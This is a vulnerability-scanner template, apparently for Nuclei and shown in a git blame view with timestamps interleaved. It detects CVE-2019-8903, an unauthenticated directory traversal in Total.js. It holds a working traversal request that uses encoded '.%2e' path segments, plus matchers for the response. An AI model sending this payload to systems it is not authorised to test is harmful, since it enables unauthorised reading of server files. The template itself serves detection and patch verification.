2021-01-02 04:59:06 +00:00
|
|
|
id: CVE-2019-8903
|
2020-04-08 07:36:36 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Totaljs - Unathenticated Directory Traversal
|
|
|
|
author: madrobot
|
|
|
|
severity: high
|
2021-03-30 12:10:17 +00:00
|
|
|
description: index.js in Total.js Platform before 3.2.3 allows path traversal.
|
|
|
|
reference: |
|
|
|
|
- https://blog.certimetergroup.com/it/articolo/security/total.js-directory-traversal-cve-2019-8903
|
|
|
|
- https://github.com/totaljs/framework/commit/c37cafbf3e379a98db71c1125533d1e8d5b5aef7
|
|
|
|
- https://github.com/totaljs/framework/commit/de16238d13848149f5d1dae51f54e397a525932b
|
2021-03-18 07:54:36 +00:00
|
|
|
tags: cve,cve2019,totaljs,lfi
|
2020-04-08 07:36:36 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2020-04-08 08:45:44 +00:00
|
|
|
- "{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"
|
2020-07-08 11:38:57 +00:00
|
|
|
matchers-condition: and
|
2020-04-08 07:36:36 +00:00
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
2020-05-25 07:49:06 +00:00
|
|
|
- 200
|
2020-04-08 11:17:49 +00:00
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "apache2.conf"
|
|
|
|
part: body
|